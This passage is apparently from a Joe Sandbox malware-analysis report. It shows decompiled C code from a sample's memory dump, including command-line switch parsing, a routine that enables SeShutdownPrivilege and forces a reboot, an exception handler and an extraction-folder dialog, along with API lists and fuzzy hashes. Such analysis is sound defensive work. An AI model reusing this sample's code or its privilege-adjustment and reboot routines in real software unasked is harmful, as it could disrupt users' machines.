						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E010D6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E010D6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x10d8004; // 0x261cebeb
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E010D597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E010D44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x10d9124 = E010D6285();
									_t75 = 0;
								}
								return E010D6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E010D44B9(0, 0x521, 0x10d1140, 0, 0x40, 0);
												_t85 =  *0x10d8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E010D667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E010D667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E010D5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E010D1680(0x10d8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E010D667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E010D667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x10d8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E010D5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x10d8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x10d8a3a;
																}
																E010D1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E010D658A(_t218, 0x104, 0x10d1140);
																if(E010D31E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x10d8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x10d8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x10d8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x10d8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x10d8a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x10d9a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x10d9a2c =  *0x10d9a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x10d8d48 =  *0x10d8d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x10d9a2c =  *0x10d9a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x10d9a2c =  *0x10d9a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x10d8d48 =  *0x10d8d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x10d9a2c =  *0x10d9a2c | 0x00000004;
																										L70:
																										 *0x10d8a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x10d9a2c = 3;
																	 *0x10d8a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x10d8a2c != 0 &&  *0x10d8b3e == 0) {
						if(GetModuleFileNameA( *0x10d9a3c, 0x10d8b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E010D66C8(0x10d8b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x010d5c9e
0x010d5ca9
0x010d5cb0
0x010d5cb3
0x010d5cb6
0x010d5cb7
0x010d5cb8
0x010d5cbd
0x010d6204
0x010d5ccb
0x00000000
0x010d5ccb
0x010d5cd3
0x010d5cd7
0x010d5cf4
0x00000000
0x010d5cf4
0x010d5cf8
0x010d5d00
0x00000000
0x010d5d06
0x010d5d06
0x010d5d0e
0x010d5d10
0x010d5d12
0x010d5d14
0x010d5d15
0x010d5d17
0x010d5d49
0x00000000
0x00000000
0x00000000
0x00000000
0x010d5d19
0x010d5d19
0x010d5d1d
0x00000000
0x010d5d3f
0x010d5d3f
0x010d5d4b
0x010d5d4b
0x010d5d4f
0x010d5d8d
0x00000000
0x010d5d93
0x010d5d93
0x010d5d9a
0x010d5d9d
0x010d5d9e
0x00000000
0x010d5d9e
0x010d5d51
0x010d5d5b
0x010d5d72
0x010d60fb
0x010d60fb
0x010d6207
0x010d620a
0x010d620b
0x010d620e
0x010d6217
0x010d5d78
0x010d5d78
0x010d5d80
0x010d5d83
0x010d5d84
0x00000000
0x010d5d84
0x010d5d5d
0x010d5d5f
0x010d5d62
0x010d5d68
0x010d5d64
0x010d5d64
0x010d5d64
0x00000000
0x010d5d62
0x010d5d5b
0x010d5d4f
0x010d5d1d
0x00000000
0x010d5d9f
0x010d5d9f
0x010d5da5
0x010d5dab
0x010d5dba
0x010d6218
0x010d621d
0x010d6220
0x010d6221
0x010d6229
0x010d6230
0x010d6247
0x010d626a
0x010d6272
0x010d6249
0x010d6255
0x010d625f
0x010d6264
0x010d6264
0x010d6284
0x010d5dc0
0x010d5dc0
0x010d5dca
0x010d5e22
0x00000000
0x00000000
0x00000000
0x00000000
0x010d5dcc
0x010d5dce
0x010d5e24
0x010d5e24
0x010d5e2c
0x010d5e47
0x010d5e4a
0x010d61d2
0x010d61e2
0x010d61e7
0x010d61ee
0x010d61f1
0x010d61f1
0x010d61f8
0x010d61f8
0x010d5e50
0x010d5e53
0x010d6109
0x010d611f
0x00000000
0x010d6125
0x010d6137
0x010d613a
0x010d613c
0x010d613e
0x010d613e
0x010d6141
0x010d6141
0x010d6143
0x010d6144
0x010d614a
0x00000000
0x010d6150
0x010d6152
0x010d615c
0x010d6170
0x010d6172
0x010d617c
0x010d6190
0x010d6190
0x010d6196
0x010d61a5
0x00000000
0x010d61ab
0x010d61b9
0x010d61c6
0x010d61c6
0x010d617e
0x010d6180
0x010d618a
0x00000000
0x00000000
0x00000000
0x00000000
0x010d618a
0x010d615e
0x010d6160
0x010d616a
0x00000000
0x00000000
0x00000000
0x00000000
0x010d616a
0x010d615c
0x010d614a
0x010d610b
0x010d610e
0x010d610e
0x00000000
0x010d5e59
0x010d5e59
0x010d5e5c
0x010d604f
0x010d6056
0x00000000
0x010d605c
0x010d606e
0x010d6071
0x010d6073
0x010d6075
0x010d6075
0x010d6078
0x010d6078
0x010d607a
0x010d607b
0x010d6081
0x00000000
0x010d6087
0x010d6087
0x010d608d
0x010d609c
0x00000000
0x010d60a2
0x010d60aa
0x010d60b2
0x010d60b7
0x010d60bd
0x010d60bf
0x010d60bf
0x010d60d6
0x010d60e0
0x010d60e7
0x010d60f5
0x00000000
0x00000000
0x00000000
0x00000000
0x010d60f5
0x010d609c
0x010d6081
0x010d5e62
0x010d5e62
0x010d5e65
0x010d5fd3
0x010d5fe9
0x00000000
0x010d5fef
0x010d5fef
0x010d5ff7
0x010d5ffd
0x010d6003
0x010d6006
0x010d6011
0x010d6014
0x010d603d
0x010d6016
0x010d6018
0x010d6019
0x010d601b
0x010d6033
0x010d601d
0x010d6020
0x010d6029
0x010d6022
0x010d6022
0x010d6022
0x010d6020
0x010d601b
0x010d6042
0x010d6044
0x010d6046
0x010d604a
0x010d5ff7
0x010d5fd5
0x010d5fd8
0x010d5fd8
0x00000000
0x010d5e6b
0x010d5e6b
0x010d5e6e
0x010d5f8b
0x010d5f99
0x00000000
0x010d5f9f
0x010d5fa7
0x010d5faf
0x00000000
0x010d5fb1
0x010d5fb3
0x00000000
0x010d5fb5
0x010d5fb7
0x00000000
0x010d5fb9
0x00000000
0x010d5fb9
0x010d5fb7
0x010d5fb3
0x010d5faf
0x010d5f8d
0x010d5f8d
0x010d5f8d
0x010d5f8f
0x010d5fc1
0x010d5fc1
0x010d5fc1
0x00000000
0x010d5e74
0x010d5e74
0x010d5e77
0x010d5ea0
0x010d5ebd
0x010d5f79
0x00000000
0x010d5f7f
0x010d5ec3
0x010d5ec3
0x010d5ecc
0x010d5ed4
0x010d5ed6
0x010d5edc
0x010d5edf
0x010d5eea
0x010d5eed
0x010d5f3f
0x010d5f40
0x00000000
0x010d5eef
0x010d5eef
0x010d5ef2
0x010d5f34
0x010d5ef4
0x010d5ef4
0x010d5ef7
0x010d5f2b
0x00000000
0x010d5ef9
0x010d5ef9
0x010d5efc
0x010d5f22
0x00000000
0x010d5efe
0x010d5eff
0x010d5f02
0x010d5f16
0x010d5f04
0x010d5f07
0x010d5f0d
0x010d5f46
0x010d5f46
0x010d5f09
0x010d5f09
0x010d5f09
0x010d5f07
0x010d5f02
0x010d5efc
0x010d5ef7
0x010d5ef2
0x010d5f4c
0x010d5f4e
0x010d5f50
0x010d5f54
0x010d5ed4
0x010d5ea2
0x010d5ea4
0x010d5eaf
0x010d5eaf
0x00000000
0x010d5e79
0x010d5e7d
0x00000000
0x010d5e83
0x010d5e83
0x010d5e83
0x010d5e85
0x010d5e85
0x010d5e8e
0x00000000
0x010d5e94
0x00000000
0x010d5e94
0x010d5e8e
0x010d5e7d
0x010d5e77
0x010d5e6e
0x010d5e65
0x010d5e5c
0x00000000
0x00000000
0x00000000
0x010d5dd0
0x010d5dd0
0x010d5dd0
0x00000000
0x010d5dd0
0x010d5dce
0x010d5dca
0x010d5dba
0x00000000
0x010d5d00
0x010d5dd9
0x010d5e04
0x010d61fe
0x010d5e0a
0x010d5e0c
0x010d5e17
0x010d5e17
0x010d5e04
0x010d6200
0x010d6200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 010D5CEE
GetModuleFileNameA.KERNEL32(010D8B3E,00000104,00000000,?,?), ref: 010D5DFC
CharUpperA.USER32(?), ref: 010D5E3E
CharUpperA.USER32(-00000052), ref: 010D5EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 010D5F6F
CharUpperA.USER32(?), ref: 010D5FA7
CharUpperA.USER32(-0000004E), ref: 010D6008
CharUpperA.USER32(?), ref: 010D60AA
CloseHandle.KERNEL32(00000000,010D1140,00000000,00000040,00000000), ref: 010D61F1
ExitProcess.KERNEL32 ref: 010D61F8

Strings

RegServer, xrefs: 010D5F66
:, xrefs: 010D6118
", xrefs: 010D612D
", xrefs: 010D5D78

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: d4ad51167d742c183a3a4d72dd566cac846b3f39fc259af342b087e2309d1a30
Instruction ID: ce8f09d04842bd57c02f33e24f0dace517a9c3a8bda191de84b277cfac7e2e3b
Opcode Fuzzy Hash: d4ad51167d742c183a3a4d72dd566cac846b3f39fc259af342b087e2309d1a30
Instruction Fuzzy Hash: 75D18971A043455EEF7ADA3C8C487FA3FF1AB56344F0481EADDC6CA185DA7689828F50

Uniqueness

Uniqueness Score: -1.00%

Function 010D1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E010D1F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x10d9a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x10d8004; // 0x261cebeb
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E010D44B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E010D6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E010D44B9(0, 0x522, 0x10d1140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E010D1EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x010d1f90
0x010d1f90
0x010d1f93
0x010d1f98
0x010d1fa4
0x010d1fa7
0x010d1fc5
0x010d1fcd
0x010d1fdb
0x010d1ee5
0x010d1eea
0x010d1ef1
0x010d1ef4
0x010d1f0c
0x010d1f2e
0x010d1f3a
0x010d1f46
0x010d1f4d
0x010d1f58
0x010d1f60
0x010d1f61
0x010d1f62
0x010d1f75
0x010d1f80
0x010d1f77
0x010d1f77
0x00000000
0x010d1f77
0x010d1f64
0x010d1f64
0x00000000
0x010d1f64
0x010d1f0e
0x010d1f0e
0x010d1f13
0x010d1f13
0x010d1f14
0x010d1f14
0x010d1f16
0x010d1f17
0x010d1f1a
0x010d1f1f
0x010d1f1f
0x010d1f86
0x010d1f8f
0x010d1fcf
0x010d1fd3
0x00000000
0x010d1fd3
0x010d1fa9
0x010d1fb4
0x010d1fbb
0x010d1fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x010d1fc3
0x010d1f9a
0x010d1f9a
0x010d1fa2
0x010d1fd9
0x010d1fda
0x00000000
0x00000000
0x00000000
0x010d1fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 010D1EFB
OpenProcessToken.ADVAPI32(00000000), ref: 010D1F02
ExitWindowsEx.USER32(00000002,00000000), ref: 010D1FD3

Strings

SeShutdownPrivilege, xrefs: 010D1F28

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 0eaeaa5b9f4954a4819a8a180eacda5e12447abd22f1dec901bc0ccd3a868f4d
Instruction ID: b59a6de032dd9c229f4e34e3385ef1aeedafa399fab3332b1defc4892c7bed3a
Opcode Fuzzy Hash: 0eaeaa5b9f4954a4819a8a180eacda5e12447abd22f1dec901bc0ccd3a868f4d
Instruction Fuzzy Hash: B02124B1B41305BBDB309AA5DC49FBF7AF8EB85B10F100098FA82E7085DF7A84408361

Uniqueness

Uniqueness Score: -1.00%

Function 010D6CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D6CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x010d6cf7
0x010d6d00
0x010d6d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,010D6E26,010D1000), ref: 010D6CF7
UnhandledExceptionFilter.KERNEL32(010D6E26,?,010D6E26,010D1000), ref: 010D6D00
GetCurrentProcess.KERNEL32(C0000409,?,010D6E26,010D1000), ref: 010D6D0B
TerminateProcess.KERNEL32(00000000,?,010D6E26,010D1000), ref: 010D6D12

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 606a5ce0b780926854fccb197424ac30f5bf9f12aa1b0f54b92ecdf0e281bc69
Instruction ID: 295ea596412ff2cb4873167e73470c175cb90cb7fcf53ba21d76227c7b83a1ba
Opcode Fuzzy Hash: 606a5ce0b780926854fccb197424ac30f5bf9f12aa1b0f54b92ecdf0e281bc69
Instruction Fuzzy Hash: CAD0123A201108FBDB202BF1E80CA593F28FB48393F444000FB5D83004CB3B4451CB51

Uniqueness

Uniqueness Score: -1.00%

Function 010D3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E010D3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E010D43D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x10d9a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10d91e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E010D44B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x10d91e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x10d91e5 - 3;
						if(_t49 - 0x10d91e5 < 3) {
							goto L32;
						}
						_t24 =  *0x10d91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x10d91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E010D658A(0x10d91e4, 0x104, 0x10d1140);
								_t27 = E010D58C8(0x10d91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x10d91e4 - 0x5c;
									if( *0x10d91e4 != 0x5c) {
										L30:
										_t30 = E010D597D(0x10d91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x10d91e5 - 0x5c;
									if( *0x10d91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E010D44B9(_t64, 0x54a, 0x10d91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x10d91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x10d91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x10d91e4 - 0x5c;
						if( *0x10d91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x10d9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x10d9a3c, 0x3e8, 0x10d8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E010D4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10d87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E010D44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x010d321b
0x010d321e
0x010d3221
0x010d343c
0x010d343e
0x010d343f
0x010d3445
0x010d3447
0x00000000
0x010d3447
0x010d3229
0x010d322a
0x010d322f
0x010d33ec
0x010d33f7
0x010d3410
0x010d3416
0x010d341d
0x010d342d
0x010d342d
0x010d3438
0x00000000
0x010d3438
0x010d3237
0x010d3243
0x010d3243
0x010d3246
0x010d32ee
0x010d32f4
0x010d32f6
0x010d33d4
0x010d33d6
0x010d33db
0x010d33dc
0x010d33de
0x010d33df
0x010d3370
0x010d3372
0x00000000
0x010d3372
0x010d32fc
0x010d3301
0x010d3301
0x010d3303
0x010d3304
0x010d3304
0x010d330a
0x010d330d
0x00000000
0x00000000
0x010d3313
0x010d3318
0x010d331a
0x010d3331
0x010d3332
0x010d333a
0x010d333d
0x010d337c
0x010d3388
0x010d338f
0x010d3394
0x010d3396
0x010d33a4
0x010d33ab
0x010d33b6
0x010d33be
0x010d33c3
0x010d33c5
0x010d3435
0x010d3437
0x010d3437
0x00000000
0x010d3437
0x010d33c7
0x010d33c9
0x010d33cc
0x00000000
0x010d33cc
0x010d33ad
0x010d33b4
0x00000000
0x00000000
0x00000000
0x010d33b4
0x010d3398
0x010d3399
0x010d339b
0x010d339c
0x010d339d
0x00000000
0x010d339d
0x010d334c
0x010d3351
0x010d3354
0x00000000
0x00000000
0x010d335c
0x010d3362
0x010d3364
0x00000000
0x00000000
0x010d3366
0x010d3367
0x010d3369
0x010d336a
0x010d336b
0x00000000
0x010d336b
0x010d331c
0x010d3323
0x00000000
0x00000000
0x010d3329
0x010d332b
0x00000000
0x00000000
0x00000000
0x010d332b
0x010d324c
0x010d324c
0x010d324f
0x010d32c8
0x010d32ce
0x00000000
0x010d32ce
0x010d3251
0x010d3256
0x00000000
0x00000000
0x010d3271
0x010d3277
0x010d3279
0x010d3298
0x010d329d
0x010d329f
0x00000000
0x00000000
0x010d32b0
0x010d32b6
0x010d32b8
0x00000000
0x00000000
0x010d32be
0x010d3280
0x010d3289
0x010d328e
0x00000000
0x010d328e
0x010d327b
0x00000000
0x010d327b
0x00000000

APIs

LoadStringA.USER32(000003E8,010D8598,00000200), ref: 010D3271
